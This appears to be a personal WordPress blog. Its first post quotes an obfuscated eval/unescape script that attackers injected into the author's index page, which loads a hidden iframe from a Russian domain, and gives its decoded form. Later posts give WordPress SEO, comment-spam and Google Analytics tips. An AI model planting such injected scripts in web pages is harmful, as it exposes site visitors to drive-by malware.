Woohoo! I just love it when someone hacks my website and installs a virus. Here’s a nice little flag that AVG gave me:

Fortunately, an upgrade from WordPress 2.2 to 2.5 and a little cleanup of the html on the homepage did the trick. This is what some hacker installed on my root index.htm file (commented just in case):

<!– <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%35%34%37%31%29%2b%27%38%30%35%34%61%38%65%32%65%5c%27%20%77%69%64%74%68%3d%36%36%37%20%68%65%69%67%68%74%3d%34%31%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> –>

And when this code is ‘unescaped’ it translates into:

<!– ("window.status=’Done’;document.write(’<iframe name=4 src=\’http://traffurl.ru/sliv?’+Math.round(Math.random()*275471)+’8054a8e2e\’ width=667 height=413 style=\’display: none\’></iframe>’) –>

I did a whois search on this Russian domain, but didn’t find any results. Thank you hackers for showing the love.

Google loves WordPress. WordPress content is a nice, tasty meal for those hungry Google spiders.

In some cases within 45 minutes of posting, content on my blog was ranked #1 for certain keyword combinations. That’s impressive how quickly Google will scan and update it’s SERPs with freshly blogged content. Recent postings on this very blog demonstrate that.

On March 29, 2008, I witnessed a scene of a crash along I-5 in Kelso, Washington- an event that affected thousands of travellers. When I got home, I went ahead and made a blog posting about it. Within 45 minutes, it was picked up by Google and ranking as the top page for all of those people Googling to find more information about it. No official news story was even published until the next day, so all of the search traffic went to this blog. The local newspaper, TDN, made their posting, but they didn’t use WordPress- they use their own system that is not optimized for search engines and probably lacks the auto-pinging functionality WordPress has. So, even though they have a better story, theirs didn’t come up in search rankings as high as my little blog posting did.

These screenshots were captured only today, but these keywords,
car crash longview, were ranked #1 like this within 45 minutes of posting:

Google works fast.

Here is another example, with the keywords: car crash i-5

When you think about it, I-5 is a LONG freeway, extending 1,381 miles from Canada all the way to Mexico. It spans major metro areas, including Seattle, Portland, Sacramento, Los Angeles, and San Diego. There are multiple wrecks every day on I-5 just in Portland alone. But think of all the wrecks that occur daily on the entire freeway and of the many thousands of people affected! Some of these people will be impacted and will search Google to find more information. So, for this blog to be ranked #2 in Google for car crash i-5 out of 235,000 results is crazy to me. WordPress is an ideal platform for fast, high rankings.

As another example, yesterday, I made a blog posting on the Best Places to Dance in Portland.

Today I checked the results, and it is ranked either #1 or the top 10 for many keyword combos:

In less than 24 hours, the keyword: Oregon Best Dancing ranked #3:

And finally here’s another keyword combo: Portland Best Dances that ranks 10th.

Even 10th is not bad for less then 24 hours and not being an authority site on dancing. This is the only dance-related post. In fact, this blog is really new and doesn’t even have very much content yet. Compare this to the many other dance websites that have been running for years with much content. Isn’t it strange that a single random WordPress posting can outrank many of these established dance websites? It shows the true importance of SEO and specifically WordPress as a web marketing tool.

WordPress also outperforms my custom-made Internet Marketing Articles area. Even though this section also has a similar structure, has good SEO, and has RSS feeds, it does not seem to get as high of rankings as WordPress does. WordPress has the advantage of the auto-pinging feature, along with my unproven hunch that Google favors blogs, especially the spider-friendly WordPress structure.

This WordPress blog is not overly pimped out, but uses a simple open source theme that is SEO friendly and I added a Twitter plug-in. That’s about it.

That should be adequate enough of a posting for you to look into this Google-influencing blog platform. The next time I do a Google search, I’ll be looking for your WordPress blog on the front page.

The default installation of WordPress is vulnerable to comment spam.

There are a few ways around it:
1. Activate Akismet, a spam catcher - the problem is it can sometimes generate ‘false positives’
2. Add a captcha - can be tricky to install and is an extra hurdle commenters have to get right- may prevent some postings.
3. Remove the URL field altogether!

I will show you the simple, manual way to remove the URL field:

1. Open your comments.php file in your HTML editor. From the root folder of your blog, go to wp-content\themes\default if you’re using the default template. If you are using a theme, select the appropriate folder of your theme, then open its comments.php file. Note: if you do not have an HTML editor, such as Dreamweaver, then open the .php file as text in Notepad. If you don’t know how to find your Notepad, just go to the start menu > Run… > and then type in ‘notepad’ and click OK- it will open and edit your .php file as text.

2. Search for this code:

<p><input type="text" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="22" tabindex="3" />
<label for="url"><small>Website</small></label></p>

<?php endif; ?>

<p><small><strong>XHTML:</strong> You can use these tags: <?php echo allowed_tags(); ?></small></p>

3. Either delete this whole text, or ‘comment it out’ (recommended). Add the tags in bold to turn the code into comments (thus, ignored):

<!– <p><input type="text" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="22" tabindex="3" />
<label for="url"><small>Website</small></label></p> –>

<?php endif; ?>

<!–<p><small><strong>XHTML:</strong> You can use these tags: <?php echo allowed_tags(); ?></small></p>–>

4. Save. That removes the URL field entirely, but we’re not finished. Because spammers have automated scripts that insert their URL variable right in the form without the need for a field. So, what we will do is change the code to stop the submission if a URL variable is set. With the URL field gone, it is not possible for a valid user submission to contain the URL variable, so by eliminating all URL variables, we don’t have to worry about false positives. It would be 100% spam, and we can prevent it…

5. Next, open up wp-comments-post.php - back to the root of your blog folder. Scroll down to where you see the following code:

if ( ” == $comment_content )
wp_die( __(’Error: please type a comment.’) );

6. Now, underneath that code, copy and paste the following code:

if (!empty ($comment_author_url))
wp_die( __(’Error: you are an idiot spammer.’) );

So, it should look like this:

…code before…

if ( ” == $comment_content )
wp_die( __(’Error: please type a comment.’) );

if (!empty ($comment_author_url))
wp_die( __(’Error: you are an idiot spammer.’) );

…code before…

7. Save. And FTP upload your 2 modified files to your server. You should not have any problem with automated spam URL fields anymore!

If you’re tried to write code in WordPress for displaying to readers, you’ve probably found out it doesn’t work too well, even using the ‘blockquote’ or ‘code’ tags before and after.

There’s three ways to publish code in WordPress:

1. Copy and paste your code into DreamWeaver while in the ‘Design View’, then click to the ‘Code View’. Your code is automatically converted to the correctly escaped characters. Just remove any additional code DreamWeaver added, like <br> or <p> tags, and copy and paste back into your WordPress blog posting. (easiest)

2. Take your code and either paste it in Dreamweaver or Word. Then manually do a search replace 4 separate times for this code. (harder)
a. Search " and replace with &#34;
b. Search ‘ and replace with &#39;
c. Search / and replace with &#47;
d. Search < and replace with &lt;

Then copy and paste your replaced code back into your WordPress posting and it will display so readers can see it.

3. Take a screenshot of your code, crop, make smaller, save, upload, and link to the image URL (hardest, and has a drawback of losing SEO of the code as text in your blog).

Don’t download any software. That is unnecessary- but is just a way for a guy to get extra links to his site.

Simply go to your WordPress folder (the root of where all your files are installed), then open up ‘wp-content’ then open your theme folder. If you’re not using a custom theme, then just enter the ‘default’ folder, then open footer.php.

In your HTML editor, copy and paste your Google tracking code immediately before the tag. You get your code from within your Google Analytics account.

So, your footer code will then look something like this:

<script src="http://www.google-analytics.com/urchin.js" type="text/ javascript">
</script>
<script type="text/javascript">
_uacct="UA-000000-0";
urchinTracker();
</script>

</body>
</html>

Wait a few days, and your visitor statistics should then be included in your Google Analytics report. Nifty.